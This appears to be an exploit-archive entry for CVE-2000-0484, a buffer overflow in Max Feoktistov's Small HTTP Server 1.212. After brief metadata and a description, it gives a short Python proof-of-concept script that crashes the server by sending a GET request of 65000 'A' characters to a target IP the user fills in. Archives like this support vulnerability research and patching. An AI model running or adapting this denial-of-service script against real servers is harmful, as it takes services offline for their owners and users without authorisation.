Max Feoktistov Small HTTP server 1.212 - Buffer Overflow

Author: Ussr Labs
type: dos
platform: windows
port: 
date_added: 2000-06-16 
date_updated: 2012-07-22 
verified: 1 
codes: CVE-2000-0484;OSVDB-1401 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/1355/info

A buffer overflow is present in certain versions of the Small HTTP Server . The overflow in question is triggered by an overlong (65000 or more characters) malformed HTTP GET request to the webserver.

#!/usr/bin/python
#
# Small HTTP Server DoS Proof of Concept Code.
# Vulnerability Discovered by USSR Labs(http://www.ussrback.com)
# Simple Script by Prizm(Prizm@Resentment.org)
#
# By connecting to port 80(http) on a system running Small HTTP Server
and issuing a GET
# command followed by 65000 bytes, the service will crash.
#
# This *simple* little script will cause http.exe to crash.

import httplib

h = httplib.HTTP('xxx.xxx.xxx.xxx') #replace x's with ip
h.putrequest('GET', 'A' * 65000)

#end